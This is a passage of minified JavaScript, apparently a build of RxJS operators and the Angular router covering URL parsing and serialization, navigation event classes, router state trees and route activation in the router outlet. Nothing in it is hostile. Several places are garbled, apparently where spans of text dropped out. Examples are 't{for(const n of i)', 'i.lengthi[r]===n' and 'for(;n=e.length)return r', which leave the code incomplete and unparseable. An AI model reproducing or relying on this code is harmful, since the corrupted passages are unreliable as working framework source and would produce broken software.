t<=0?()=>ha:Ie((a,e)=>{let i=0;a.subscribe(Ae(e,n=>{++i<=t&&(e.next(n),t<=i&&e.complete())}))})}function Ro(...t){const a=Vn(t);return Ie((e,i)=>{(a?ug(t,e,a):ug(t,e)).subscribe(i)})}function B4(t){return Ie((a,e)=>{let i=!1;a.subscribe(Ae(e,n=>{i=!0,e.next(n)},()=>{i||e.next(t),e.complete()}))})}function YN(t=pme){return Ie((a,e)=>{let i=!1;a.subscribe(Ae(e,n=>{i=!0,e.next(n)},()=>i?e.complete():e.error(t())))})}function pme(){return new V4}function xd(t,a){const e=arguments.length>=2;return i=>i.pipe(t?Dn((n,r)=>t(n,r,i)):v,Cn(1),e?B4(a):YN(()=>new V4))}function qr(t,a,e){const i=ie(t)||a||e?{next:t,error:a,complete:e}:t;return i?Ie((n,r)=>{var c;null===(c=i.subscribe)||void 0===c||c.call(i);let d=!0;n.subscribe(Ae(r,T=>{var k;null===(k=i.next)||void 0===k||k.call(i,T),r.next(T)},()=>{var T;d=!1,null===(T=i.complete)||void 0===T||T.call(i),r.complete()},T=>{var k;d=!1,null===(k=i.error)||void 0===k||k.call(i,T),r.error(T)},()=>{var T,k;d&&(null===(T=i.unsubscribe)||void 0===T||T.call(i)),null===(k=i.finalize)||void 0===k||k.call(i)}))}):v}function Sh(t){return Ie((a,e)=>{let r,i=null,n=!1;i=a.subscribe(Ae(e,void 0,void 0,c=>{r=pn(t(c,Sh(t)(a))),i?(i.unsubscribe(),i=null,r.subscribe(e)):n=!0})),n&&(i.unsubscribe(),i=null,r.subscribe(e))})}function _me(t,a,e,i,n){return(r,c)=>{let d=e,T=a,k=0;r.subscribe(Ae(c,q=>{const Y=k++;T=d?t(T,q,Y):(d=!0,q),i&&c.next(T)},n&&(()=>{d&&c.next(T),c.complete()})))}}function JN(t,a){return Ie(_me(t,a,arguments.length>=2,!0))}function Mx(t){return t<=0?()=>ha:Ie((a,e)=>{let i=[];a.subscribe(Ae(e,n=>{i.push(n),t{for(const n of i)e.next(n);e.complete()},void 0,()=>{i=null}))})}function ZN(t,a){const e=arguments.length>=2;return i=>i.pipe(t?Dn((n,r)=>t(n,r,i)):v,Mx(1),e?B4(a):YN(()=>new V4))}function eL(t,a=!1){return Ie((e,i)=>{let n=0;e.subscribe(Ae(i,r=>{const c=t(r,n++);(c||a)&&i.next(r),!c&&i.complete()}))})}function H4(t){return Xe(()=>t)}function U4(t){return Ie((a,e)=>{try{a.subscribe(e)}finally{e.add(t)}})}const Nn="primary",yy=Symbol("RouteTitle");class gme{constructor(a){this.params=a||{}}has(a){return Object.prototype.hasOwnProperty.call(this.params,a)}get(a){if(this.has(a)){const e=this.params[a];return Array.isArray(e)?e[0]:e}return null}getAll(a){if(this.has(a)){const e=this.params[a];return Array.isArray(e)?e:[e]}return[]}get keys(){return Object.keys(this.params)}}function M1(t){return new gme(t)}function Cme(t,a,e){const i=e.path.split("/");if(i.length>t.length||"full"===e.pathMatch&&(a.hasChildren()||i.lengthi[r]===n)}return t===a}function iL(t){return Array.prototype.concat.apply([],t)}function aL(t){return t.length>0?t[t.length-1]:null}function oc(t,a){for(const e in t)t.hasOwnProperty(e)&&a(t[e],e)}function sp(t){return fD(t)?t:qC(t)?Sa(Promise.resolve(t)):Bi(t)}const Mme={exact:function rL(t,a,e){if(!fg(t.segments,a.segments)||!q4(t.segments,a.segments,e)||t.numberOfChildren!==a.numberOfChildren)return!1;for(const i in a.children)if(!t.children[i]||!rL(t.children[i],a.children[i],e))return!1;return!0},subset:sL},nL={exact:function vme(t,a){return mu(t,a)},subset:function Ame(t,a){return Object.keys(a).length<=Object.keys(t).length&&Object.keys(a).every(e=>tL(t[e],a[e]))},ignored:()=>!0};function oL(t,a,e){return Mme[e.paths](t.root,a.root,e.matrixParams)&&nL[e.queryParams](t.queryParams,a.queryParams)&&!("exact"===e.fragment&&t.fragment!==a.fragment)}function sL(t,a,e){return cL(t,a,a.segments,e)}function cL(t,a,e,i){if(t.segments.length>e.length){const n=t.segments.slice(0,e.length);return!(!fg(n,e)||a.hasChildren()||!q4(n,e,i))}if(t.segments.length===e.length){if(!fg(t.segments,e)||!q4(t.segments,e,i))return!1;for(const n in a.children)if(!t.children[n]||!sL(t.children[n],a.children[n],i))return!1;return!0}{const n=e.slice(0,t.segments.length),r=e.slice(t.segments.length);return!!(fg(t.segments,n)&&q4(t.segments,n,i)&&t.children[Nn])&&cL(t.children[Nn],a,r,i)}}function q4(t,a,e){return a.every((i,n)=>nL[e](t[n].parameters,i.parameters))}class hg{constructor(a,e,i){this.root=a,this.queryParams=e,this.fragment=i}get queryParamMap(){return this._queryParamMap||(this._queryParamMap=M1(this.queryParams)),this._queryParamMap}toString(){return Dme.serialize(this)}}class qn{constructor(a,e){this.segments=a,this.children=e,this.parent=null,oc(e,(i,n)=>i.parent=this)}hasChildren(){return this.numberOfChildren>0}get numberOfChildren(){return Object.keys(this.children).length}toString(){return G4(this)}}class by{constructor(a,e){this.path=a,this.parameters=e}get parameterMap(){return this._parameterMap||(this._parameterMap=M1(this.parameters)),this._parameterMap}toString(){return uL(this)}}function fg(t,a){return t.length===a.length&&t.every((e,i)=>e.path===a[i].path)}let lL=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:function(){return new Ax},providedIn:"root"}),t})();class Ax{parse(a){const e=new Nme(a);return new hg(e.parseRootSegment(),e.parseQueryParams(),e.parseFragment())}serialize(a){const e=`/${My(a.root,!0)}`,i=function Ime(t){const a=Object.keys(t).map(e=>{const i=t[e];return Array.isArray(i)?i.map(n=>`${j4(e)}=${j4(n)}`).join("&"):`${j4(e)}=${j4(i)}`}).filter(e=>!!e);return a.length?`?${a.join("&")}`:""}(a.queryParams);return`${e}${i}${"string"==typeof a.fragment?`#${function xme(t){return encodeURI(t)}(a.fragment)}`:""}`}}const Dme=new Ax;function G4(t){return t.segments.map(a=>uL(a)).join("/")}function My(t,a){if(!t.hasChildren())return G4(t);if(a){const e=t.children[Nn]?My(t.children[Nn],!1):"",i=[];return oc(t.children,(n,r)=>{r!==Nn&&i.push(`${r}:${My(n,!1)}`)}),i.length>0?`${e}(${i.join("//")})`:e}{const e=function Eme(t,a){let e=[];return oc(t.children,(i,n)=>{n===Nn&&(e=e.concat(a(i,n)))}),oc(t.children,(i,n)=>{n!==Nn&&(e=e.concat(a(i,n)))}),e}(t,(i,n)=>n===Nn?[My(t.children[Nn],!1)]:[`${n}:${My(i,!1)}`]);return 1===Object.keys(t.children).length&&null!=t.children[Nn]?`${G4(t)}/${e[0]}`:`${G4(t)}/(${e.join("//")})`}}function dL(t){return encodeURIComponent(t).replace(/%40/g,"@").replace(/%3A/gi,":").replace(/%24/g,"$").replace(/%2C/gi,",")}function j4(t){return dL(t).replace(/%3B/gi,";")}function Tx(t){return dL(t).replace(/\(/g,"%28").replace(/\)/g,"%29").replace(/%26/gi,"&")}function Q4(t){return decodeURIComponent(t)}function mL(t){return Q4(t.replace(/\+/g,"%20"))}function uL(t){return`${Tx(t.path)}${function wme(t){return Object.keys(t).map(a=>`;${Tx(a)}=${Tx(t[a])}`).join("")}(t.parameters)}`}const Rme=/^[^\/()?;=#]+/;function $4(t){const a=t.match(Rme);return a?a[0]:""}const Sme=/^[^=?&#]+/,Pme=/^[^&#]+/;class Nme{constructor(a){this.url=a,this.remaining=a}parseRootSegment(){return this.consumeOptional("/"),""===this.remaining||this.peekStartsWith("?")||this.peekStartsWith("#")?new qn([],{}):new qn([],this.parseChildren())}parseQueryParams(){const a={};if(this.consumeOptional("?"))do{this.parseQueryParam(a)}while(this.consumeOptional("&"));return a}parseFragment(){return this.consumeOptional("#")?decodeURIComponent(this.remaining):null}parseChildren(){if(""===this.remaining)return{};this.consumeOptional("/");const a=[];for(this.peekStartsWith("(")||a.push(this.parseSegment());this.peekStartsWith("/")&&!this.peekStartsWith("//")&&!this.peekStartsWith("/(");)this.capture("/"),a.push(this.parseSegment());let e={};this.peekStartsWith("/(")&&(this.capture("/"),e=this.parseParens(!0));let i={};return this.peekStartsWith("(")&&(i=this.parseParens(!1)),(a.length>0||Object.keys(e).length>0)&&(i[Nn]=new qn(a,e)),i}parseSegment(){const a=$4(this.remaining);if(""===a&&this.peekStartsWith(";"))throw new gi(4009,!1);return this.capture(a),new by(Q4(a),this.parseMatrixParams())}parseMatrixParams(){const a={};for(;this.consumeOptional(";");)this.parseParam(a);return a}parseParam(a){const e=$4(this.remaining);if(!e)return;this.capture(e);let i="";if(this.consumeOptional("=")){const n=$4(this.remaining);n&&(i=n,this.capture(i))}a[Q4(e)]=Q4(i)}parseQueryParam(a){const e=function kme(t){const a=t.match(Sme);return a?a[0]:""}(this.remaining);if(!e)return;this.capture(e);let i="";if(this.consumeOptional("=")){const c=function Ome(t){const a=t.match(Pme);return a?a[0]:""}(this.remaining);c&&(i=c,this.capture(i))}const n=mL(e),r=mL(i);if(a.hasOwnProperty(n)){let c=a[n];Array.isArray(c)||(c=[c],a[n]=c),c.push(r)}else a[n]=r}parseParens(a){const e={};for(this.capture("(");!this.consumeOptional(")")&&this.remaining.length>0;){const i=$4(this.remaining),n=this.remaining[i.length];if("/"!==n&&")"!==n&&";"!==n)throw new gi(4010,!1);let r;i.indexOf(":")>-1?(r=i.slice(0,i.indexOf(":")),this.capture(r),this.capture(":")):a&&(r=Nn);const c=this.parseChildren();e[r]=1===Object.keys(c).length?c[Nn]:new qn([],c),this.consumeOptional("//")}return e}peekStartsWith(a){return this.remaining.startsWith(a)}consumeOptional(a){return!!this.peekStartsWith(a)&&(this.remaining=this.remaining.substring(a.length),!0)}capture(a){if(!this.consumeOptional(a))throw new gi(4011,!1)}}function Ex(t){return t.segments.length>0?new qn([],{[Nn]:t}):t}function K4(t){const a={};for(const i of Object.keys(t.children)){const r=K4(t.children[i]);(r.segments.length>0||r.hasChildren())&&(a[i]=r)}return function Lme(t){if(1===t.numberOfChildren&&t.children[Nn]){const a=t.children[Nn];return new qn(t.segments.concat(a.segments),a.children)}return t}(new qn(t.segments,a))}function pg(t){return t instanceof hg}function Fme(t,a,e,i,n){var r;if(0===e.length)return v1(a.root,a.root,a.root,i,n);const d=function pL(t){if("string"==typeof t[0]&&1===t.length&&"/"===t[0])return new fL(!0,0,t);let a=0,e=!1;const i=t.reduce((n,r,c)=>{if("object"==typeof r&&null!=r){if(r.outlets){const d={};return oc(r.outlets,(T,k)=>{d[k]="string"==typeof T?T.split("/"):T}),[...n,{outlets:d}]}if(r.segmentPath)return[...n,r.segmentPath]}return"string"!=typeof r?[...n,r]:0===c?(r.split("/").forEach((d,T)=>{0==T&&"."===d||(0==T&&""===d?e=!0:".."===d?a++:""!=d&&n.push(d))}),n):[...n,r]},[]);return new fL(e,a,i)}(e);return d.toRoot()?v1(a.root,a.root,new qn([],{}),i,n):function T(q){var Y;const te=function Bme(t,a,e,i){if(t.isAbsolute)return new A1(a.root,!0,0);if(-1===i)return new A1(e,e===a.root,0);return function _L(t,a,e){let i=t,n=a,r=e;for(;r>n;){if(r-=n,i=i.parent,!i)throw new gi(4005,!1);n=i.segments.length}return new A1(i,!1,n-r)}(e,i+(vy(t.commands[0])?0:1),t.numberOfDoubleDots)}(d,a,null===(Y=t.snapshot)||void 0===Y?void 0:Y._urlSegment,q),pe=te.processChildren?Ty(te.segmentGroup,te.index,d.commands):xx(te.segmentGroup,te.index,d.commands);return v1(a.root,te.segmentGroup,pe,i,n)}(null===(r=t.snapshot)||void 0===r?void 0:r._lastPathIndex)}function vy(t){return"object"==typeof t&&null!=t&&!t.outlets&&!t.segmentPath}function Ay(t){return"object"==typeof t&&null!=t&&t.outlets}function v1(t,a,e,i,n){let c,r={};i&&oc(i,(T,k)=>{r[k]=Array.isArray(T)?T.map(q=>`${q}`):`${T}`}),c=t===a?e:hL(t,a,e);const d=Ex(K4(c));return new hg(d,r,n)}function hL(t,a,e){const i={};return oc(t.children,(n,r)=>{i[r]=n===a?e:hL(n,a,e)}),new qn(t.segments,i)}class fL{constructor(a,e,i){if(this.isAbsolute=a,this.numberOfDoubleDots=e,this.commands=i,a&&i.length>0&&vy(i[0]))throw new gi(4003,!1);const n=i.find(Ay);if(n&&n!==aL(i))throw new gi(4004,!1)}toRoot(){return this.isAbsolute&&1===this.commands.length&&"/"==this.commands[0]}}class A1{constructor(a,e,i){this.segmentGroup=a,this.processChildren=e,this.index=i}}function xx(t,a,e){if(t||(t=new qn([],{})),0===t.segments.length&&t.hasChildren())return Ty(t,a,e);const i=function Ume(t,a,e){let i=0,n=a;const r={match:!1,pathIndex:0,commandIndex:0};for(;n=e.length)return r;const c=t.segments[n],d=e[i];if(Ay(d))break;const T=`${d}`,k=i0&&void 0===T)break;if(T&&k&&"object"==typeof k&&void 0===k.outlets){if(!CL(T,k,c))return r;i+=2}else{if(!CL(T,{},c))return r;i++}n++}return{match:!0,pathIndex:n,commandIndex:i}}(t,a,e),n=e.slice(i.commandIndex);if(i.match&&i.pathIndex{"string"==typeof r&&(r=[r]),null!==r&&(n[c]=xx(t.children[c],a,r))}),oc(t.children,(r,c)=>{void 0===i[c]&&(n[c]=r)}),new qn(t.segments,n)}}function wx(t,a,e){const i=t.segments.slice(0,a);let n=0;for(;n{"string"==typeof e&&(e=[e]),null!==e&&(a[i]=wx(new qn([],{}),0,e))}),a}function gL(t){const a={};return oc(t,(e,i)=>a[i]=`${e}`),a}function CL(t,a,e){return t==e.path&&mu(a,e.parameters)}class kh{constructor(a,e){this.id=a,this.url=e}}class Ey extends kh{constructor(a,e,i="imperative",n=null){super(a,e),this.type=0,this.navigationTrigger=i,this.restoredState=n}toString(){return`NavigationStart(id: ${this.id}, url: '${this.url}')`}}class Ph extends kh{constructor(a,e,i){super(a,e),this.urlAfterRedirects=i,this.type=1}toString(){return`NavigationEnd(id: ${this.id}, url: '${this.url}', urlAfterRedirects: '${this.urlAfterRedirects}')`}}class X4 extends kh{constructor(a,e,i,n){super(a,e),this.reason=i,this.code=n,this.type=2}toString(){return`NavigationCancel(id: ${this.id}, url: '${this.url}')`}}class yL extends kh{constructor(a,e,i,n){super(a,e),this.error=i,this.target=n,this.type=3}toString(){return`NavigationError(id: ${this.id}, url: '${this.url}', error: ${this.error})`}}class Gme extends kh{constructor(a,e,i,n){super(a,e),this.urlAfterRedirects=i,this.state=n,this.type=4}toString(){return`RoutesRecognized(id: ${this.id}, url: '${this.url}', urlAfterRedirects: '${this.urlAfterRedirects}', state: ${this.state})`}}class jme extends kh{constructor(a,e,i,n){super(a,e),this.urlAfterRedirects=i,this.state=n,this.type=7}toString(){return`GuardsCheckStart(id: ${this.id}, url: '${this.url}', urlAfterRedirects: '${this.urlAfterRedirects}', state: ${this.state})`}}class Qme extends kh{constructor(a,e,i,n,r){super(a,e),this.urlAfterRedirects=i,this.state=n,this.shouldActivate=r,this.type=8}toString(){return`GuardsCheckEnd(id: ${this.id}, url: '${this.url}', urlAfterRedirects: '${this.urlAfterRedirects}', state: ${this.state}, shouldActivate: ${this.shouldActivate})`}}class $me extends kh{constructor(a,e,i,n){super(a,e),this.urlAfterRedirects=i,this.state=n,this.type=5}toString(){return`ResolveStart(id: ${this.id}, url: '${this.url}', urlAfterRedirects: '${this.urlAfterRedirects}', state: ${this.state})`}}class Kme extends kh{constructor(a,e,i,n){super(a,e),this.urlAfterRedirects=i,this.state=n,this.type=6}toString(){return`ResolveEnd(id: ${this.id}, url: '${this.url}', urlAfterRedirects: '${this.urlAfterRedirects}', state: ${this.state})`}}class Xme{constructor(a){this.route=a,this.type=9}toString(){return`RouteConfigLoadStart(path: ${this.route.path})`}}class Yme{constructor(a){this.route=a,this.type=10}toString(){return`RouteConfigLoadEnd(path: ${this.route.path})`}}class Jme{constructor(a){this.snapshot=a,this.type=11}toString(){return`ChildActivationStart(path: '${this.snapshot.routeConfig&&this.snapshot.routeConfig.path||""}')`}}class Zme{constructor(a){this.snapshot=a,this.type=12}toString(){return`ChildActivationEnd(path: '${this.snapshot.routeConfig&&this.snapshot.routeConfig.path||""}')`}}class eue{constructor(a){this.snapshot=a,this.type=13}toString(){return`ActivationStart(path: '${this.snapshot.routeConfig&&this.snapshot.routeConfig.path||""}')`}}class tue{constructor(a){this.snapshot=a,this.type=14}toString(){return`ActivationEnd(path: '${this.snapshot.routeConfig&&this.snapshot.routeConfig.path||""}')`}}class bL{constructor(a,e,i){this.routerEvent=a,this.position=e,this.anchor=i,this.type=15}toString(){return`Scroll(anchor: '${this.anchor}', position: '${this.position?`${this.position[0]}, ${this.position[1]}`:null}')`}}class ML{constructor(a){this._root=a}get root(){return this._root.value}parent(a){const e=this.pathFromRoot(a);return e.length>1?e[e.length-2]:null}children(a){const e=Ix(a,this._root);return e?e.children.map(i=>i.value):[]}firstChild(a){const e=Ix(a,this._root);return e&&e.children.length>0?e.children[0].value:null}siblings(a){const e=Rx(a,this._root);return e.length<2?[]:e[e.length-2].children.map(n=>n.value).filter(n=>n!==a)}pathFromRoot(a){return Rx(a,this._root).map(e=>e.value)}}function Ix(t,a){if(t===a.value)return a;for(const e of a.children){const i=Ix(t,e);if(i)return i}return null}function Rx(t,a){if(t===a.value)return[a];for(const e of a.children){const i=Rx(t,e);if(i.length)return i.unshift(a),i}return[]}class Oh{constructor(a,e){this.value=a,this.children=e}toString(){return`TreeNode(${this.value})`}}function T1(t){const a={};return t&&t.children.forEach(e=>a[e.value.outlet]=e),a}class vL extends ML{constructor(a,e){super(a),this.snapshot=e,Sx(this,a)}toString(){return this.snapshot.toString()}}function AL(t,a){const e=function aue(t,a){const c=new Y4([],{},{},"",{},Nn,a,null,t.root,-1,{});return new EL("",new Oh(c,[]))}(t,a),i=new zs([new by("",{})]),n=new zs({}),r=new zs({}),c=new zs({}),d=new zs(""),T=new Tl(i,n,c,d,r,Nn,a,e.root);return T.snapshot=e.root,new vL(new Oh(T,[]),e)}class Tl{constructor(a,e,i,n,r,c,d,T){var k,q;this.url=a,this.params=e,this.queryParams=i,this.fragment=n,this.data=r,this.outlet=c,this.component=d,this.title=null!==(q=null===(k=this.data)||void 0===k?void 0:k.pipe(Xe(Y=>Y[yy])))&&void 0!==q?q:Bi(void 0),this._futureSnapshot=T}get routeConfig(){return this._futureSnapshot.routeConfig}get root(){return this._routerState.root}get parent(){return this._routerState.parent(this)}get firstChild(){return this._routerState.firstChild(this)}get children(){return this._routerState.children(this)}get pathFromRoot(){return this._routerState.pathFromRoot(this)}get paramMap(){return this._paramMap||(this._paramMap=this.params.pipe(Xe(a=>M1(a)))),this._paramMap}get queryParamMap(){return this._queryParamMap||(this._queryParamMap=this.queryParams.pipe(Xe(a=>M1(a)))),this._queryParamMap}toString(){return this.snapshot?this.snapshot.toString():`Future(${this._futureSnapshot})`}}function TL(t,a="emptyOnly"){const e=t.pathFromRoot;let i=0;if("always"!==a)for(i=e.length-1;i>=1;){const n=e[i],r=e[i-1];if(n.routeConfig&&""===n.routeConfig.path)i--;else{if(r.component)break;i--}}return function nue(t){return t.reduce((a,e)=>{var i;return{params:Object.assign(Object.assign({},a.params),e.params),data:Object.assign(Object.assign({},a.data),e.data),resolve:Object.assign(Object.assign(Object.assign(Object.assign({},e.data),a.resolve),null===(i=e.routeConfig)||void 0===i?void 0:i.data),e._resolvedData)}},{params:{},data:{},resolve:{}})}(e.slice(i))}class Y4{constructor(a,e,i,n,r,c,d,T,k,q,Y,te){var pe;this.url=a,this.params=e,this.queryParams=i,this.fragment=n,this.data=r,this.outlet=c,this.component=d,this.title=null===(pe=this.data)||void 0===pe?void 0:pe[yy],this.routeConfig=T,this._urlSegment=k,this._lastPathIndex=q,this._correctedLastPathIndex=null!=te?te:q,this._resolve=Y}get root(){return this._routerState.root}get parent(){return this._routerState.parent(this)}get firstChild(){return this._routerState.firstChild(this)}get children(){return this._routerState.children(this)}get pathFromRoot(){return this._routerState.pathFromRoot(this)}get paramMap(){return this._paramMap||(this._paramMap=M1(this.params)),this._paramMap}get queryParamMap(){return this._queryParamMap||(this._queryParamMap=M1(this.queryParams)),this._queryParamMap}toString(){return`Route(url:'${this.url.map(i=>i.toString()).join("/")}', path:'${this.routeConfig?this.routeConfig.path:""}')`}}class EL extends ML{constructor(a,e){super(e),this.url=a,Sx(this,e)}toString(){return DL(this._root)}}function Sx(t,a){a.value._routerState=t,a.children.forEach(e=>Sx(t,e))}function DL(t){const a=t.children.length>0?` { ${t.children.map(DL).join(", ")} } `:"";return`${t.value}${a}`}function kx(t){if(t.snapshot){const a=t.snapshot,e=t._futureSnapshot;t.snapshot=e,mu(a.queryParams,e.queryParams)||t.queryParams.next(e.queryParams),a.fragment!==e.fragment&&t.fragment.next(e.fragment),mu(a.params,e.params)||t.params.next(e.params),function yme(t,a){if(t.length!==a.length)return!1;for(let e=0;emu(e.parameters,a[i].parameters))}(t.url,a.url);return e&&!(!t.parent!=!a.parent)&&(!t.parent||Px(t.parent,a.parent))}function Dy(t,a,e){if(e&&t.shouldReuseRoute(a.value,e.value.snapshot)){const i=e.value;i._futureSnapshot=a.value;const n=function rue(t,a,e){return a.children.map(i=>{for(const n of e.children)if(t.shouldReuseRoute(i.value,n.value.snapshot))return Dy(t,i,n);return Dy(t,i)})}(t,a,e);return new Oh(i,n)}{if(t.shouldAttach(a.value)){const r=t.retrieve(a.value);if(null!==r){const c=r.route;return c.value._futureSnapshot=a.value,c.children=a.children.map(d=>Dy(t,d)),c}}const i=function sue(t){return new Tl(new zs(t.url),new zs(t.params),new zs(t.queryParams),new zs(t.fragment),new zs(t.data),t.outlet,t.component,t)}(a.value),n=a.children.map(r=>Dy(t,r));return new Oh(i,n)}}const Ox="ngNavigationCancelingError";function xL(t,a){const{redirectTo:e,navigationBehaviorOptions:i}=pg(a)?{redirectTo:a,navigationBehaviorOptions:void 0}:a,n=wL(!1,0,a);return n.url=e,n.navigationBehaviorOptions=i,n}function wL(t,a,e){const i=new Error("NavigationCancelingError: "+(t||""));return i[Ox]=!0,i.cancellationCode=a,e&&(i.url=e),i}function IL(t){return RL(t)&&pg(t.url)}function RL(t){return t&&t[Ox]}class cue{constructor(){this.outlet=null,this.route=null,this.resolver=null,this.injector=null,this.children=new xy,this.attachRef=null}}let xy=(()=>{class t{constructor(){this.contexts=new Map}onChildOutletCreated(e,i){const n=this.getOrCreateContext(e);n.outlet=i,this.contexts.set(e,n)}onChildOutletDestroyed(e){const i=this.getContext(e);i&&(i.outlet=null,i.attachRef=null)}onOutletDeactivated(){const e=this.contexts;return this.contexts=new Map,e}onOutletReAttached(e){this.contexts=e}getOrCreateContext(e){let i=this.getContext(e);return i||(i=new cue,this.contexts.set(e,i)),i}getContext(e){return this.contexts.get(e)||null}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const J4=!1;let Nx=(()=>{class t{constructor(e,i,n,r,c){this.parentContexts=e,this.location=i,this.changeDetector=r,this.environmentInjector=c,this.activated=null,this._activatedRoute=null,this.activateEvents=new Tt,this.deactivateEvents=new Tt,this.attachEvents=new Tt,this.detachEvents=new Tt,this.name=n||Nn,e.onChildOutletCreated(this.name,this)}ngOnDestroy(){var e;(null===(e=this.parentContexts.getContext(this.name))||void 0===e?void 0:e.outlet)===this&&this.parentContexts.onChildOutletDestroyed(this.name)}ngOnInit(){if(!this.activated){const e=this.parentContexts.getContext(this.name);e&&e.route&&(e.attachRef?this.attach(e.attachRef,e.route):this.activateWith(e.route,e.injector))}}get isActivated(){return!!this.activated}get component(){if(!this.activated)throw new gi(4012,J4);return this.activated.instance}get activatedRoute(){if(!this.activated)throw new gi(4012,J4);return this._activatedRoute}get activatedRouteData(){return this._activatedRoute?this._activatedRoute.snapshot.data:{}}detach(){if(!this.activated)throw new gi(4012,J4);this.location.detach();const e=this.activated;return this.activated=null,this._activatedRoute=null,this.detachEvents.emit(e.instance),e}attach(e,i){this.activated=e,this._activatedRoute=i,this.location.insert(e.hostView),this.attachEvents.emit(e.instance)}deactivate(){if(this.activated){const e=this.component;this.activated.destroy(),this.activated=null,this._activatedRoute=null,this.deactivateEvents.emit(e)}}activateWith(e,i){if(this.isActivated)throw new gi(4013,J4);this._activatedRoute=e;const n=this.location,c=e._futureSnapshot.component,d=this.parentContexts.getOrCreateContext(this.name).children,T=new lue(e,d,n.injector);if(i&&function due(t){return!!t.resolveComponentFactory}(i)){const k=i.resolveComponentFactory(c);this.activated=n.createComponent(k,n.length,T)}else this.activated=n.createComponent(c,{index:n.length,injector:T,environmentInjector:null!=i?i:this.environmentInjector});this.changeDetector.markForCheck(),this.activateEvents.emit(this.activated.instance)}}return t.\u0275fac=function(e){return new(e||t)(Ee(xy),Ee(fo),Vr("name"),Ee(Ma),Ee(Ht))},t.\u0275dir=Ot({type:t,selectors:[["router-outlet"]],outputs:{activateEvents:"activate",deactivateEvents:"deactivate",attachEvents:"attach",detachEvents:"detach"},exportAs:["outlet"],standalone:!0}),t})();class lue{constructor(a,e,i){this.route=a,this.childContexts=e,this.parent=i}get(a,e){return a===Tl?this.route:a===xy?this.childContexts:this.parent.get(a,e)}}let Lx=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ng-component"]],standalone:!0,features:[Lk],decls:1,vars:0,template:function(e,i){1&e&&it(0,"router-outlet")},dependencies:[Nx],encapsulation:2}),t})();function SL(t,a){var e;return t.providers&&!t._injector&&(t._injector=Sv(t.providers,a,`Route: ${t.path}`)),null!==(e=t._injector)&&void 0!==e?e:a}function Wx(t){const a=t.children&&t.children.map(Wx),e=a?Object.assign(Object.assign({},t),{children:a}):Object.assign({},t);return!e.component&&!e.loadComponent&&(a||e.loadChildren)&&e.outlet&&e.outlet!==Nn&&(e.component=Lx),e}function wd(t){return t.outlet||Nn}function kL(t,a){const e=t.filter(i=>wd(i)===a);return e.push(...t.filter(i=>wd(i)!==a)),e}function wy(t){var a;if(!t)return null;if(null!==(a=t.routeConfig)&&void 0!==a&&a._injector)return t.routeConfig._injector;for(let e=t.parent;e;e=e.parent){const i=e.routeConfig;if(null!=i&&i._loadedInjector)return i._loadedInjector;if(null!=i&&i._injector)return i._injector}return null}class pue{constructor(a,e,i,n){this.routeReuseStrategy=a,this.futureState=e,this.currState=i,this.forwardEvent=n}activate(a){const e=this.futureState._root,i=this.currState?this.currState._root:null;this.deactivateChildRoutes(e,i,a),kx(this.futureState.root),this.activateChildRoutes(e,i,a)}deactivateChildRoutes(a,e,i){const n=T1(e);a.children.forEach(r=>{const c=r.value.outlet;this.deactivateRoutes(r,n[c],i),delete n[c]}),oc(n,(r,c)=>{this.deactivateRouteAndItsChildren(r,i)})}deactivateRoutes(a,e,i){const n=a.value,r=e?e.value:null;if(n===r)if(n.component){const c=i.getContext(n.outlet);c&&this.deactivateChildRoutes(a,e,c.children)}else this.deactivateChildRoutes(a,e,i);else r&&this.deactivateRouteAndItsChildren(e,i)}deactivateRouteAndItsChildren(a,e){a.value.component&&this.routeReuseStrategy.shouldDetach(a.value.snapshot)?this.detachAndStoreRouteSubtree(a,e):this.deactivateRouteAndOutlet(a,e)}detachAndStoreRouteSubtree(a,e){const i=e.getContext(a.value.outlet),n=i&&a.value.component?i.children:e,r=T1(a);for(const c of Object.keys(r))this.deactivateRouteAndItsChildren(r[c],n);if(i&&i.outlet){const c=i.outlet.detach(),d=i.children.onOutletDeactivated();this.routeReuseStrategy.store(a.value.snapshot,{componentRef:c,route:a,contexts:d})}}deactivateRouteAndOutlet(a,e){const i=e.getContext(a.value.outlet),n=i&&a.value.component?i.children:e,r=T1(a);for(const c of Object.keys(r))this.deactivateRouteAndItsChildren(r[c],n);i&&i.outlet&&(i.outlet.deactivate(),i.children.onOutletDeactivated(),i.attachRef=null,i.resolver=null,i.route=null)}activateChildRoutes(a,e,i){const n=T1(e);a.children.forEach(r=>{this.activateRoutes(r,n[r.value.outlet],i),this.forwardEvent(new tue(r.value.snapshot))}),a.children.length&&this.forwardEvent(new Zme(a.value.snapshot))}activateRoutes(a,e,i){var n;const r=a.value,c=e?e.value:null;if(kx(r),r===c)if(r.component){const d=i.getOrCreateContext(r.outlet);this.activateChildRoutes(a,e,d.children)}else this.activateChildRoutes(a,e,i);else if(r.component){const d=i.getOrCreateContext(r.outlet);if(this.routeReuseStrategy.shouldAttach(r.snapshot)){const T=this.routeReuseStrategy.retrieve(r.snapshot);this.routeReuseStrategy.store(r.snapshot,null),d.children.onOutletReAttached(T.contexts),d.attachRef=T.componentRef,d.route=T.route.value,d.outlet&&d.outlet.attach(T.componentRef,T.route.value),kx(T.route.value),this.activateChildRoutes(a,null,d.children)}else{const T=wy(r.snapshot),k=null!==(n=null==T?void 0:T.get(On))&&void 0!==n?n:null;d.attachRef=null,d.route=r,d.resolver=k,d.injector=T,d.outlet&&d.outlet.activateWith(r,d.injector),this.activateChildRoutes(a,null,d.children)}}else this.activateChildRoutes(a,null,i)}}class PL{constructor(a){this.path=a,this.route=this.path[this.path.length-1]}}class Z4{constructor(a,e){this.component=a,this.route=e}}function _ue(t,a,e){const i=t._root;return Iy(i,a?a._root:null,e,[i.value])}function E1(t,a){const e=Symbol(),i=a.get(t,e);return i===e?"function"!=typeof t||function t0(t){return null!==Hu(t)}(t)?a.get(t):t:i}function Iy(t,a,e,i,n={canDeactivateChecks:[],canActivateChecks:[]}){const r=T1(a);return t.children.forEach(c=>{(function Cue(t,a,e,i,n={canDeactivateChecks:[],canActivateChecks:[]}){const r=t.value,c=a?a.value:null,d=e?e.getContext(t.value.outlet):null;if(c&&r.routeConfig===c.routeConfig){const T=function yue(t,a,e){if("function"==typeof e)return 